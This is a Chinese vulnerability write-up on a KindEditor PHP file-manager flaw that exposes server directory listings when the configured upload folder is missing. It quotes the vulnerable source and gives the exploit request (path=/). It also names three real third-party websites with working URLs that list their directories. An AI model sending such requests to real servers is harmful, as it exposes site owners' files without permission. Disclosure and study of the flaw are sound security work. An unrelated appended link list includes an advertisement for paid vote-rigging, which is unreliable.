佚名
佚名

Kindeditor特定情况可能会导致全盘浏览的漏洞

因为例子很少,开始想了下不是他们的漏洞,后面想了下,后面没有检查好用户的正常配置内容导致,还是提下吧。

下载地址:

貌似是最新版本的。

测试语言:PHP
测试漏洞文件:/kindeditor/php/file_manager_json.php
默认配置(第16行):


$root_path = $php_path . '../attached/';

当/attached/文件夹不存在(被删)或者被改名为一个不存在的目录时,如网上的一个例子:

$root_path = $php_path . '../../../upload/';

这个CMS下面的目录根本就没得这个目录,所以就造成了漏洞。

怎么造成了漏洞的呢?我们分析下。

PHP Code 复制内容到剪贴板
  2. /**  
  3.  * KindEditor PHP  
  4.  *  
  5.  * 本PHP程序是演示程序,建议不要直接在实际项目中使用。  
  6.  * 如果您确定直接使用本程序,使用之前请仔细确认相关安全设置。  
  7.  *  
  8.  */  
  9.   
  10. require_once 'JSON.php';   
  11.   
  12. $php_path = dirname(__FILE__) . '/';   
  13. $php_url = dirname($_SERVER['PHP_SELF']) . '/';   
  14.   
  15. //根目录路径,可以指定绝对路径,比如 /var/www/attached/   
  16. $root_path = $php_path . '../../../upload/';   
  17. //根目录URL,可以指定绝对路径,比如 http://www.yoursite.com/attached/   
  18. $root_url = $php_url . '../../../upload/';   
  19. //图片扩展名   
  20. $ext_arr = array('gif''jpg''jpeg''png''bmp');   
  21.   
  22. //目录名   
  23. $dir_name = emptyempty($_GET['dir']) ? '' : trim($_GET['dir']);   
  24. if (!in_array($dir_namearray('''image''flash''media''file'))) {   
  25. echo "Invalid Directory name.";   
  26. exit;   
  27. }   
  28. if ($dir_name !== '') {   
  29. $root_path .= $dir_name . "/";   
  30. $root_url .= $dir_name . "/";   
  31. if (!file_exists($root_path)) {   
  32. mkdir($root_path);   
  33. }   
  34. }   
  35.   
  36. //根据path参数,设置各路径和URL   
  37. if (emptyempty($_GET['path'])) {   
  38. $current_path = realpath($root_path) . '/';   
  39. $current_url = $root_url;   
  40. $current_dir_path = '';   
  41. $moveup_dir_path = '';   
  42. else {   
  43. $current_path = realpath($root_path) . '/' . $_GET['path'];   
  44. $current_url = $root_url . $_GET['path'];   
  45. $current_dir_path = $_GET['path'];   
  46. $moveup_dir_path = preg_replace('/(.*?)[^\/]+\/$/''$1'$current_dir_path);   
  47. }   
  48. //echo realpath($root_path);   
  49. //排序形式,name or size or type   
  50. $order = emptyempty($_GET['order']) ? 'name' : strtolower($_GET['order']);   
  51.   
  52. //不允许使用..移动到上一级目录   
  53. if (preg_match('/\.\./'$current_path)) {   
  54. echo 'Access is not allowed.';   
  55. exit;   
  56. }   
  57. //最后一个字符不是/   
  58. if (!preg_match('/\/$/'$current_path)) {   
  59. echo 'Parameter is not valid.';   
  60. exit;   
  61. }   
  62. //目录不存在或不是目录   
  63. if (!file_exists($current_path) || !is_dir($current_path)) {   
  64. echo 'Directory does not exist.';   
  65. exit;   
  66. }   
  67.   
  68. //遍历目录取得文件信息   
  69. $file_list = array();   
  70. if ($handle = opendir($current_path)) {   
  71. $i = 0;   
  72. while (false !== ($filename = readdir($handle))) {   
  73. if ($filename{0} == '.'continue;   
  74. $file = $current_path . $filename;   
  75. if (is_dir($file)) {   
  76. $file_list[$i]['is_dir'] = true; //是否文件夹   
  77. $file_list[$i]['has_file'] = (count(scandir($file)) > 2); //文件夹是否包含文件   
  78. $file_list[$i]['filesize'] = 0; //文件大小   
  79. $file_list[$i]['is_photo'] = false; //是否图片   
  80. $file_list[$i]['filetype'] = ''//文件类别,用扩展名判断   
  81. else {   
  82. $file_list[$i]['is_dir'] = false;   
  83. $file_list[$i]['has_file'] = false;   
  84. $file_list[$i]['filesize'] = filesize($file);   
  85. $file_list[$i]['dir_path'] = '';   
  86. $file_ext = strtolower(pathinfo($file, PATHINFO_EXTENSION));   
  87. $file_list[$i]['is_photo'] = in_array($file_ext$ext_arr);   
  88. $file_list[$i]['filetype'] = $file_ext;   
  89. }   
  90. $file_list[$i]['filename'] = $filename//文件名,包含扩展名   
  91. $file_list[$i]['datetime'] = date('Y-m-d H:i:s'filemtime($file)); //文件最后修改时间   
  92. $i++;   
  93. }   
  94. closedir($handle);   
  95. }   
  96.   
  97. //排序   
  98. function cmp_func($a$b) {   
  99. global $order;   
  100. if ($a['is_dir'] && !$b['is_dir']) {   
  101. return -1;   
  102. else if (!$a['is_dir'] && $b['is_dir']) {   
  103. return 1;   
  104. else {   
  105. if ($order == 'size') {   
  106. if ($a['filesize'] > $b['filesize']) {   
  107. return 1;   
  108. else if ($a['filesize'] < $b['filesize']) {   
  109. return -1;   
  110. else {   
  111. return 0;   
  112. }   
  113. else if ($order == 'type') {   
  114. return strcmp($a['filetype'], $b['filetype']);   
  115. else {   
  116. return strcmp($a['filename'], $b['filename']);   
  117. }   
  118. }   
  119. }   
  120. usort($file_list'cmp_func');   
  121.   
  122. $result = array();   
  123. //相对于根目录的上一级目录   
  124. $result['moveup_dir_path'] = $moveup_dir_path;   
  125. //相对于根目录的当前目录   
  126. $result['current_dir_path'] = $current_dir_path;   
  127. //当前目录的URL   
  128. $result['current_url'] = $current_url;   
  129. //文件数   
  130. $result['total_count'] = count($file_list);   
  131. //文件列表数组   
  132. $result['file_list'] = $file_list;   
  133.   
  134. //输出JSON字符串   
  135. header('Content-type: application/json; charset=UTF-8');   
  136. $json = new Services_JSON();   
  137. echo $json->encode($result);  


第三十八行:

$current_path = realpath($root_path) . '/';

当$root_path被realpath以后,不存在的目录会返回空,然后连接后面的'/'

$current_path所以默认就等于'/'

当提交了$_GET['path']以后,而且$_GET['path']要以'/'为结尾(有验证),所以,我们就可以构造浏览全盘目录了。

kingedit/php/file_manager_json.php?path=/ (浏览盘符的根目录)

接着上面给出验证的(互联网找到几个):
先给本地的(attached文件夹被我删了):

Kindeditor特定情况可能会导致全盘浏览的漏洞_第1张图片

Kindeditor特定情况可能会导致全盘浏览的漏洞_第2张图片

互联网找到的:

http://demo.douco.com/admin/include/kindeditor/php/file_manager_json.php?path=home/demodoucokdce4mmohd8okuoc1o/wwwroot/&dir=image

Kindeditor特定情况可能会导致全盘浏览的漏洞_第3张图片

http://route53.com.tw/static/jscripts/kindeditor/php/file_manager_json.php?path=home/onepage/public_html/



http://www.bndvalve.com/Public/kindeditor/php/file_manager_json.php?path=wwwroot/bonade/

Kindeditor特定情况可能会导致全盘浏览的漏洞_第4张图片

修复方案:再验证下绝对路径?

你可能感兴趣的:(Kindeditor特定情况可能会导致全盘浏览的漏洞)

  • 当抠门女遇上朱允炆8 语菲菲儿
    刘筱玉惊得呆了,她实在想象不出那个胆小到动不动就发抖的婵儿会自尽。努力咽下口里的食物,问道:“她现在怎么样了?还……还活着吗?”鹃儿是朱允炆亲自派到景阳殿来的,不过二十出头,却十分老到。她恭恭敬敬地回道:“回娘娘,婵儿还活着,但情况不乐观。”刘筱玉站起来向外走去,没想到才走两步就头晕目眩身软无力,鹃儿看她不支,忙上前扶住道:“娘娘是要去婵儿那里?”刘筱玉抓住鹃儿的手稳住身体,点头道:“是,你扶我过
  • 浅谈律诗四平头 田心木目心
    律诗的创造有很多讲究,稍不注意就容易构成律诗的瑕疵,律诗常犯的毛病有“四平头”或“六平头”。那么什么是律诗的四平头呢?所谓“四平头”,这个很少有人定义它的内涵,朋友们先看一首七律,我们暂且不管该诗的意境,如下:题目省略柳条袅袅笑春风,云朵追随伴彩虹。桐叶松枝装翠岭,鲜花碧水映苍穹。西风送去尘烟滚,北雁飞来呼唤匆。寒雪无声沉默降,银装有韵腊梅红。这首诗,出现了“柳条”,“云朵”,“桐叶”,“鲜花”,
  • Navicat 连接不上阿里云服务器中安装的宝塔面板中的Mysql服务器 一只程序熊 阿里云服务器云计算
    项目场景:就今天在做宝塔的时候遇到一个新问题,在之前的阿里云服务器中都没有发现过这个问题!特此记录解决方案:本地连接不上云服务器主要是这几个原因:1.云服务器官方的安全组问题(安全组是否放行目标端口)2.云服务器内部的服务端口问题(服务器内部端口是否向外部开放)但是今天我又在云服务器安全组内部发现了一个新的问题:3.云服务器中设置了仅本机访问的ipv6的地址,但是仍然访问不了。可能是因为navic
  • python学习路线(从菜鸟到起飞) 突突突然不会编了 python学习开发语言
    以下是基于2025年最新技术趋势的Python学习路线,综合多个权威资源整理而成,涵盖从零基础到进阶应用的全流程,适合不同学习目标(如Web开发、数据分析、人工智能等)的学习者。路线分为基础、进阶、实战、高级、方向拓展五个阶段,并附学习资源推荐:一、基础阶段(1-2个月)目标:掌握Python核心语法与编程思维,熟悉开发环境。环境搭建安装Python3.10+,配置PyCharm或VSCode开发
  • php(上传文件)
    1、php文件上传配置指令(1)file_uploads=On/off(是否可以接受文件上传)(2)max_input_time=60在提示错误之前解析输入所花费的最长时间,以秒为单位,如果经常需要传输大文件,这个时限应该设置得合理一些。(3)max_file_uploads=20对可以同时上传文件数设置了一个上限。(4)memory_limit=128M设置脚本可以分配得最大内存,可以防止脚本独
  • 阿里云2023年云服务器活动优惠价格文章汇总(历史价格对比) 阿里云最新优惠和活动汇总
    2023年购买阿里云服务器需要多少钱?由于每个月阿里云服务器的活动优惠价格均有所不同,小编也在每个月都会分享几篇当月阿里云服务器活动优惠价格的文章,下面小编再将2023年1月到5月份,涉及阿里云服务器每个月优惠价格的文章做个汇总,以供大家了解阿里云服务器在2023年的历史优惠价格变化情况,知道哪些阿里云服务器涨价了,哪些阿里云服务器降价了,以供参考选择。说明:以下文章所涉及的阿里云服务器价格仅供参
  • 小白带你部署LNMP分布式部署 刘俊涛liu 分布式
    目录前言一、概述二、LNMP环境部署三、配置nginx1、yum安装2、编译安装四、安装1、编译安装nginx2、网络源3、稍作优化4、修改配置文件vim/usr/local/nginx/conf/nginx.conf5、书写测试页面五、部署应用前言LNMP平台指的是将Linux、Nginx、MySQL和PHP(或者其他的编程语言,如Python、Perl等)集成在一起的一种Web服务器环境。它是
  • 【LeetCode 1695. 删除子数组的最大得分】解析 李昊_ LeetCodeleetcode算法数据结构
    目录LeetCode中国站原文原始题目题目描述示例1:示例2:提示:讲解滑动窗口的艺术:寻找无与伦比的“纯净”子数组第一部分:算法思想——可伸缩的“探索边界”1.问题的核心:找到最“值钱”的“纯净”片段2.滑动窗口:一个能屈能伸的“探索框”第二部分:代码实现——滑动窗口的“装备”完整代码展示代码精讲LeetCode中国站原文https://leetcode.cn/problems/maximum-
  • 你一时情绪失控,对孩子的影响却是一生 海之蓝心
    今天的关键词是“情绪”。说到情绪,有时候觉得做妈妈真的很难。既要工作,又要顾着家庭,有时候就会很焦躁,情绪波动就比较大。可能因为一点小事,就对孩子发火。发完火是一时痛快了,可是把情绪宣泄到弱小无辜的孩子身上,对他的影响却是一生的。我曾经的坏情绪对女儿现在产生了影响昨晚女儿出现了“失眠”症状,翻来覆去睡不着。我有些急,因为忙了一天打算孩子睡着后学会儿英语,就说“既然你睡不着就起来看会书吧,我学英语。
  • 贺州亲子鉴定的种类有哪些?【附贺州本地12家DNA鉴定中心地址电话】 中正DNA鉴定中心
    随着社会的发展和个人权利意识的提高,在贺州地区越来越多的人开始关注亲子鉴定相关的法律规定。本文将探讨贺州亲子鉴定的种类有哪些、进行亲子鉴定的法定程序以及相关法律保障和限制,以期为公众提供清晰、准确的信息。一、亲子鉴定的种类根据检测方法和技术的不同,亲子鉴定主要分为以下几类:1.常规亲子鉴定:通过对父母和孩子的DNA样本进行比对,判断他们之间是否存在亲子关系。这种鉴定方法准确率较高,一般适用于无特殊
  • 他人的力量 燕依珊
    习惯了带着孩子晚饭后走走一是助消化二是运动乃强身健体所以现在想来去年冬天的感冒多发期很多孩子都传染了,感冒形势空前严峻据说有些班级几十人的只剩几个在上课想来平时的散步也是有点潜移默化的作用吧孩子们已经习惯了自从大妞上了课后补习班之后就有更多的时间饭后可以一起玩游戏、一起散步、一起看书等等这次也不例外在城里上学也快两年了相对设施还算完善书店、图书馆什么的也是能常去所以在刚走出小区没多久小小妞就问我妈
  • AI Agent开发学习系列 - langchain之示例选择器2:相关性与多样性兼得-MaxMarginalRelevanceExampleSelector在LangChain中的用法 alex100 AIAgent学习人工智能langchainprompt语言模型python
    MaxMarginalRelevanceExampleSelectorMaxMarginalRelevanceExampleSelector是LangChain中用于Few-ShotPrompt的一种智能示例选择器。它的作用是:在众多示例中,自动选择与当前输入最相关、同时彼此多样性最大的示例,插入到prompt里。主要特点相关性优先:优先选择与用户输入最相似的示例。多样性保证:避免选到内容高度重复
  • AI Agent开发学习系列 - langchain之memory(1):内存中的短时记忆 alex100 AIAgent学习人工智能langchainprompt语言模型python
    内存中的短时记忆,在LangChain中通常指ConversationBufferMemory这类“对话缓冲记忆”工具。它的作用是:在内存中保存最近的对话历史,让大模型能理解上下文,实现连续对话。对话缓冲记忆”工具主要特点只保留最近的对话内容(如最近N轮),不会无限增长,节省内存和token。适合短对话、上下文关联不深的场景。支持多种变体,如窗口记忆(ConversationBufferWindo
  • 复盘日志㈡ 李怡芳
    Part11,从本单元中我学到的最重要的理念(精读和视听说分别总结)精读:拥有一个真心朋友是人生的幸事,一定要珍惜与朋友之间的友谊,及时与朋友联系。视听说:用不同的方式去休闲娱乐,在电影中放松自我,在音乐中感受欢乐,让自己身心愉悦。2,我在本片文章/音频/视频中学到的怦然心动的单词(精读和视听说分别总结)精读:available,orsomething,goahead,byheart,kindof
  • 折角 惠浅
    懂事的风适时吹起记忆里一个温暖的折角翻过来灵感不期而遇暮光是老朋友那么隐亮那么接近童年跟着月亮走丢的孩子只有地址,没有方向信赖往事,信赖未知信赖一个遥远的早上梦比夜更长
  • vue如何使用websocket
    //websocket连接letwebSocketPort=url+'/ws/socket'constdataList=ref([]);//用于展示从WebSocket获取的消息letws=null;//WebSocket实例letreconnectTimeout=null;//重连超时控制//建立WebSocket连接constconnectWebSocket=()=>{ws=newWebSoc
  • 在UniApp中防止页面上下拖动的方法 阿凤21 uni-app前端
    1、pages.json中在某个页面设置禁用弹性滚动的页面{"path":"pages/yourPage/yourPage","style":{"app-plus":{"bounce":"none"}}}2、pages.json中在所有页面设置禁用弹性滚动的页面{"globalStyle":{"app-plus":{"bounce":"none"}}}3、使用css实现/*禁用页面滚动*/page
  • 淘宝中秋节有什么活动吗?中秋节淘宝会有优惠活动吗? 氧惠评测
    淘宝中秋节会有优惠活动,并且活动内容丰富多样,旨在为消费者带来实实在在的优惠和愉悦的购物体验。以下是一些具体的活动内容和特点:活动时间预热期:通常在中秋节前一周左右开始,具体时间可能会因淘宝官方调整而有所变化。例如,2024年的预热期为9月12日0点至20点。正式开卖:中秋节期间,具体时间段包括正式开卖时间和满减、立减等优惠的使用时间。例如,2024年的正式开卖时间为9月12日20点至9月15日2
  • 微信投票平台怎么联系,一般多少钱一票 神州网络公司
    微信投票平台怎么联系,一般多少钱一票微信真实人工拉票正常价格都是0.2-0.4一票,100票一次性收费在30块左右,1000票一次性收费在200元到400元之间,10000票一次性收费在3000元左右,当然因投票活动操作难度不同收费价络也不同的,然后团队的资源人次比你自己的资源人脉更多更广。人工代刷一般都是在几毛左右,直接买票这样比较方便一点,微信人工刷票真真实实的人工去操作投票,每人一票都不是同
  • 力扣热题100 - 矩阵:矩阵置零 菲英的学习笔记 力扣热题100leetcode矩阵算法c++go
    本题主要考察代码能力。题目描述:题号:73给定一个mxn的矩阵,如果一个元素为0,则将其所在行和列的所有元素都设为0。请使用原地算法。解题思路:思路一:利用第一行第一列记录0算法思路:1、用2个变量记录矩阵第1行、第1列有没有02、遍历矩阵,如果遇到0则将其对应的第1行和第1列元素置03、遍历矩阵,若元素对应的第1行或第1列元素为0则将其置0时间复杂度:O(N)空间复杂度:O(1)C++//C++
  • 幻颜秀秀官方邀请口令131314,专注短视频变现平台! 荟聚时刻
    幻颜秀秀是一个专注短视频变现的平台,不管你有没有短视频的经验,注册幻颜秀秀以后就可以使用幻颜秀秀来赚佣金,幻颜秀秀是一个专业的短视频各种玩法变现工具。很多人第一次接触幻颜秀秀不知道幻颜秀秀邀请口令是什么,其实幻颜秀秀的官方邀请口令是131314,如何我们要制作各种视频玩法,我们打开幻颜秀秀APP输入幻颜秀秀口令,就可以轻松制作同款视频。幻颜秀秀注册步骤,扫描下方二维码注册幻颜秀秀官方邀请口令131
  • 如何构建FunASR的本地语音识别服务
    FunASR简介FunASR是阿里巴巴达摩院开源的高性能语音识别工具包,支持离线识别和实时流式识别两种模式。其核心特点包括:支持多种语音任务:ASR(自动语音识别)、VAD(语音活动检测)、标点恢复、关键词检测等。提供预训练模型:覆盖中文、英文等多语言,支持不同场景(通用、会议、直播等)。支持多种部署方式:本地Python、Docker容器、ONNX推理优化等。开源地址:GitHub-FunASR
  • 福州个人亲子鉴定正规机构名单查询一览(附2024年鉴定汇总大全) 中检国权有限公司
    亲子鉴定,一个听起来就让人充满好奇的词汇。在现代社会,亲子鉴定已经成为一种常见的法律手段,用于解决家庭纠纷、遗产继承等问题。而血型鉴定作为亲子鉴定的一种方式,其功效不容小觑。本文将详细探讨亲子鉴定血型的功效,带你走进这个神秘的领域。福州做亲子鉴定的正规机构:1、福州国权基因亲子鉴定咨询中心福州亲子鉴定中心地址:福建省福州市鼓楼区东街街道中福广场807室福州亲子鉴定中心咨询:13860613595福
  • 2025 睿抗机器人开发者大赛CAIP-编程技能赛-本科组(省赛)题解 弥彦_ 睿抗算法c++
    目录前言RC-u1早鸟价考察算法:思路:注意点:accode:RC-u2谁进线下了?III考察算法:思路:注意点:accode:RC-u3点格棋评价:考察算法:思路:注意点:accode:RC-u4TreeTree的考察算法:思路:注意点:accode:RC-u5游戏设计师考察算法:思路:注意点:accode:前言被t3折磨坏了,几乎全部时间都在调t3,最后只拿了36分,呜呜呜。RC-u1早鸟价考
  • 麦当劳优惠券领取在哪里?领取方法详细介绍! 爱生活爱氧券
    麦当劳优惠券领取在哪里?领取方法详细介绍!麦当劳作为全球知名的快餐品牌,在我国拥有着极高的人气。为了回馈广大消费者,麦当劳推出了各种优惠活动,其中优惠券是一种非常受欢迎的福利。那么,如何领取麦当劳优惠券呢?本文将详细介绍麦当劳优惠券的领取方法和途径。一、线上领取途径1.麦当劳官方网站访问麦当劳官方网站,可以找到优惠券领取页面。在这里,你可以领取到各种类型的优惠券,包括新品试用、套餐优惠、单品折扣等
  • 老八路 杨乐生
    唯一健在的乐山籍抗大学员——从西坝走出去的老八路杨乐生/文石实,本名胡正培,又名胡岷沫,1921年4月24日(农历辛酉年三月十七日)出生于四川省五通桥区西溶镇(今西坝镇)。按西坝胡家正字辈大排行,石实排行第九,父辈以上称他“九九”,同辈称“九哥(弟)”,侄辈称“九伯(叔)”,孙辈称“九爷爷”。六岁时,在西溶镇私立楚省小学启蒙教育,十一岁入镇立小学,高小毕业。十三岁考入乐山县立初级中学就读。年仅十六
  • 力扣Leetcode热题100-二分查找 解题思路分享 花卷321 Leetcode热门100leetcode职场和发展java开发语言
    1.搜索插入位置题目如下:给定一个排序数组和一个目标值,在数组中找到目标值,并返回其索引。如果目标值不存在于数组中,返回它将会被按顺序插入的位置。请必须使用时间复杂度为O(logn)的算法。思路分析与最基本的二分查找算法类似,但是基础的二分查找在找不到值的时候一般情况下返回-1,找到的值返回索引,下面先展示最基本的二分查找的Java代码:publicstaticintbinarySearch(in
  • 语音识别开源项目推荐:GitHub热门仓库盘点 AGI大模型与大数据研究院 AI大模型应用开发实战语音识别开源githubai
    2024年必看!GitHub热门语音识别开源项目全解析:从入门到实战关键词语音识别(ASR)、开源项目、GitHub、Whisper、FunASR、PaddleSpeech、深度学习摘要想象一下:开车时只需说一句话就能自动发消息,听英文演讲时实时获得中文翻译,给视障人士读文本时精准转换——这些场景的背后,语音识别(AutomaticSpeechRecognition,ASR)技术正在改变我们与机器
  • c++day05(ASCII) 有点。 #C++少儿c++
    学习目标字符型常量和变量字符的输入、输出ASCII码和字符运算键盘为什么不按照字母顺序排序历史原因:早期的机械打字机上,字母键是按照字母顺序排列的。当打字员打字速度很快时,打字机上的金属臂会相互碰撞,导致键盘卡顿,影响打字速度和精度。为了解决这个问题,打字机制造商重新设计了键盘,将经常使用的字母键分散在键盘上,以减少键盘卡顿。除了历史原因,分散的设计也是为了优化打字速度。键盘上的字母键被分成两个主
  • 2023-09-10 阅来悦好_ba43
    司春丽工作日志9.10今天我们迎来了第39个教师节敬爱的老师,祝您节日快乐!在人生的道路上,无论是你,是我,是他,老师从未缺席,是他们用关怀呵护我们健康成长,用智慧指引我们走向远方……后来我发现,老师可以是我们身边的任何一个人。
  • jdk tomcat 环境变量配置 Array_06 javajdktomcat
    Win7 下如何配置java环境变量 1。准备jdk包,win7系统,tomcat安装包(均上网下载即可) 2。进行对jdk的安装,尽量为默认路径(但要记住啊!!以防以后配置用。。。) 3。分别配置高级环境变量。   电脑-->右击属性-->高级环境变量-->环境变量。 分别配置 : path    &nbs
  • Spring调SDK包报java.lang.NoSuchFieldError错误 bijian1013 javaspring
            在工作中调另一个系统的SDK包,出现如下java.lang.NoSuchFieldError错误。 org.springframework.web.util.NestedServletException: Handler processing failed; nested exception is java.l
  • LeetCode[位运算] - #136 数组中的单一数 Cwind java题解位运算LeetCodeAlgorithm
    原题链接:#136 Single Number 要求: 给定一个整型数组,其中除了一个元素之外,每个元素都出现两次。找出这个元素 注意:算法的时间复杂度应为O(n),最好不使用额外的内存空间 难度:中等 分析: 题目限定了线性的时间复杂度,同时不使用额外的空间,即要求只遍历数组一遍得出结果。由于异或运算 n XOR n = 0, n XOR 0 = n,故将数组中的每个元素进
  • qq登陆界面开发 15700786134 qq
    今天我们来开发一个qq登陆界面,首先写一个界面程序,一个界面首先是一个Frame对象,即是一个窗体。然后在这个窗体上放置其他组件。代码如下: public class First {         public void initul(){        jf=ne
  • Linux的程序包管理器RPM 被触发 linux
    在早期我们使用源代码的方式来安装软件时,都需要先把源程序代码编译成可执行的二进制安装程序,然后进行安装。这就意味着每次安装软件都需要经过预处理-->编译-->汇编-->链接-->生成安装文件--> 安装,这个复杂而艰辛的过程。为简化安装步骤,便于广大用户的安装部署程序,程序提供商就在特定的系统上面编译好相关程序的安装文件并进行打包,提供给大家下载,我们只需要根据自己的
  • socket通信遇到EOFException 肆无忌惮_ EOFException
    java.io.EOFException at java.io.ObjectInputStream$PeekInputStream.readFully(ObjectInputStream.java:2281) at java.io.ObjectInputStream$BlockDataInputStream.readShort(ObjectInputStream.java:
  • 基于spring的web项目定时操作 知了ing javaWeb
    废话不多说,直接上代码,很简单 配置一下项目启动就行 1,web.xml <?xml version="1.0" encoding="UTF-8"?> <web-app xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns="h
  • 树形结构的数据库表Schema设计 矮蛋蛋 schema
    原文地址: http://blog.csdn.net/MONKEY_D_MENG/article/details/6647488     程序设计过程中,我们常常用树形结构来表征某些数据的关联关系,如企业上下级部门、栏目结构、商品分类等等,通常而言,这些树状结构需要借助于数据库完成持久化。然而目前的各种基于关系的数据库,都是以二维表的形式记录存储数据信息,
  • maven将jar包和源码一起打包到本地仓库 alleni123 maven
    http://stackoverflow.com/questions/4031987/how-to-upload-sources-to-local-maven-repository <project> ... <build> <plugins> <plugin> <groupI
  • java IO操作 与 File 获取文件或文件夹的大小,可读,等属性!!! 百合不是茶
    类 File File是指文件和目录路径名的抽象表示形式。 1,何为文件: 标准文件(txt doc mp3...) 目录文件(文件夹) 虚拟内存文件   2,File类中有可以创建文件的 createNewFile()方法,在创建新文件的时候需要try{} catch(){}因为可能会抛出异常;也有可以判断文件是否是一个标准文件的方法isFile();这些防抖都
  • Spring注入有继承关系的类(2) bijian1013 javaspring
    被注入类的父类有相应的属性,Spring可以直接注入相应的属性,如下所例:1.AClass类 package com.bijian.spring.test4; public class AClass { private String a; private String b; public String getA() { retu
  • 30岁转型期你能否成为成功人士 bijian1013 成长励志
            很多人由于年轻时走了弯路,到了30岁一事无成,这样的例子大有人在。但同样也有一些人,整个职业生涯都发展得很优秀,到了30岁已经成为职场的精英阶层。由于做猎头的原因,我们接触很多30岁左右的经理人,发现他们在职业发展道路上往往有很多致命的问题。在30岁之前,他们的职业生涯表现很优秀,但从30岁到40岁这一段,很多人
  • 【Velocity四】Velocity与Java互操作 bit1129 velocity
    Velocity出现的目的用于简化基于MVC的web应用开发,用于替代JSP标签技术,那么Velocity如何访问Java代码.本篇继续以Velocity三http://bit1129.iteye.com/blog/2106142中的例子为基础,      POJO    package com.tom.servlets; public
  • 【Hive十一】Hive数据倾斜优化 bit1129 hive
    什么是Hive数据倾斜问题   操作:join,group by,count distinct 现象:任务进度长时间维持在99%(或100%),查看任务监控页面,发现只有少量(1个或几个)reduce子任务未完成;查看未完成的子任务,可以看到本地读写数据量积累非常大,通常超过10GB可以认定为发生数据倾斜。 原因:key分布不均匀 倾斜度衡量:平均记录数超过50w且
  • 在nginx中集成lua脚本:添加自定义Http头,封IP等 ronin47 nginx lua csrf
    Lua是一个可以嵌入到Nginx配置文件中的动态脚本语言,从而可以在Nginx请求处理的任何阶段执行各种Lua代码。刚开始我们只是用Lua 把请求路由到后端服务器,但是它对我们架构的作用超出了我们的预期。下面就讲讲我们所做的工作。 强制搜索引擎只索引mixlr.com Google把子域名当作完全独立的网站,我们不希望爬虫抓取子域名的页面,降低我们的Page rank。 location /{
  • java-3.求子数组的最大和 bylijinnan java
    package beautyOfCoding; public class MaxSubArraySum { /** * 3.求子数组的最大和 题目描述: 输入一个整形数组,数组里有正数也有负数。 数组中连续的一个或多个整数组成一个子数组,每个子数组都有一个和。 求所有子数组的和的最大值。要求时间复杂度为O(n)。 例如输入的数组为1, -2, 3, 10, -4,
  • Netty源码学习-FileRegion bylijinnan javanetty
    今天看org.jboss.netty.example.http.file.HttpStaticFileServerHandler.java 可以直接往channel里面写入一个FileRegion对象,而不需要相应的encoder: //pipeline(没有诸如“FileRegionEncoder”的handler): public ChannelPipeline ge
  • 使用ZeroClipboard解决跨浏览器复制到剪贴板的问题 cngolon 跨浏览器复制到粘贴板Zero Clipboard
    Zero Clipboard的实现原理 Zero Clipboard 利用透明的Flash让其漂浮在复制按钮之上,这样其实点击的不是按钮而是 Flash ,这样将需要的内容传入Flash,再通过Flash的复制功能把传入的内容复制到剪贴板。 Zero Clipboard的安装方法 首先需要下载 Zero Clipboard的压缩包,解压后把文件夹中两个文件:ZeroClipboard.js
  • 单例模式 cuishikuan 单例模式
    第一种(懒汉,线程不安全): public class Singleton {   2     private static Singleton instance;   3     pri
  • spring+websocket的使用 dalan_123
    一、spring配置文件 <?xml version="1.0" encoding="UTF-8"?><beans xmlns="http://www.springframework.org/schema/beans"    xmlns:xsi="http://www.w3.or
  • 细节问题:ZEROFILL的用法范围。 dcj3sjt126com mysql
    1、zerofill把月份中的一位数字比如1,2,3等加前导0 mysql> CREATE TABLE t1 (year YEAR(4), month INT(2) UNSIGNED ZEROFILL,    -> day
  • Android开发10——Activity的跳转与传值 dcj3sjt126com Android开发
    Activity跳转与传值,主要是通过Intent类,Intent的作用是激活组件和附带数据。   一、Activity跳转 方法一Intent intent = new Intent(A.this, B.class); startActivity(intent)   方法二Intent intent = new Intent();intent.setCla
  • jdbc 得到表结构、主键 eksliang jdbc 得到表结构、主键
    转自博客:http://blog.csdn.net/ocean1010/article/details/7266042 假设有个con DatabaseMetaData dbmd = con.getMetaData(); rs = dbmd.getColumns(con.getCatalog(), schema, tableName, null); rs.getSt
  • Android 应用程序开关GPS gqdy365 android
    要在应用程序中操作GPS开关需要权限: <uses-permission android:name="android.permission.WRITE_SECURE_SETTINGS" /> 但在配置文件中添加此权限之后会报错,无法再eclipse里面正常编译,怎么办? 1、方法一:将项目放到Android源码中编译; 2、方法二:网上有人说cl
  • Windows上调试MapReduce zhiquanliu mapreduce
    1.下载hadoop2x-eclipse-plugin https://github.com/winghc/hadoop2x-eclipse-plugin.git 把 hadoop2.6.0-eclipse-plugin.jar 放到eclipse plugin 目录中。 2.下载 hadoop2.6_x64_.zip http://dl.iteye.com/topics/download/d2b
  • 如何看待一些知名博客推广软文的行为? justjavac 博客
    本文来自我在知乎上的一个回答:http://www.zhihu.com/question/23431810/answer/24588621 互联网上的两种典型心态: 当初求种像条狗,如今撸完嫌人丑 当初搜贴像条犬,如今读完嫌人软 你为啥感觉不舒服呢? 难道非得要作者把自己的劳动成果免费给你用,你才舒服? 就如同 Google 关闭了 Gooled Reader,那是
  • sql优化总结 macroli sql
    为了是自己对sql优化有更好的原则性,在这里做一下总结,个人原则如有不对请多多指教。谢谢!   要知道一个简单的sql语句执行效率,就要有查看方式,一遍更好的进行优化。   一、简单的统计语句执行时间 declare @d datetime ---定义一个datetime的变量set @d=getdate() ---获取查询语句开始前的时间select user_id
  • Linux Oracle中常遇到的一些问题及命令总结 超声波 oraclelinux
    1.linux更改主机名   (1)#hostname oracledb    临时修改主机名 (2) vi /etc/sysconfig/network   修改hostname (3) vi /etc/hosts        修改IP对应的主机名   2.linux重启oracle实例及监听的各种方法 (注意操作的顺序应该是先监听,后数据库实例) &nbs
  • hive函数大全及使用示例 superlxw1234 hadoophive函数
      具体说明及示例参 见附件文档。     文档目录:   目录 一、关系运算: 4 1. 等值比较: = 4 2. 不等值比较: <> 4 3. 小于比较: < 4 4. 小于等于比较: <= 4 5. 大于比较: > 5 6. 大于等于比较: >= 5 7. 空值判断: IS NULL 5
  • Spring 4.2新特性-使用@Order调整配置类加载顺序 wiselyman spring 4
    4.1 @Order Spring 4.2 利用@Order控制配置类的加载顺序 4.2 演示 两个演示bean package com.wisely.spring4_2.order; public class Demo1Service { } package com.wisely.spring4_2.order; public class
按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他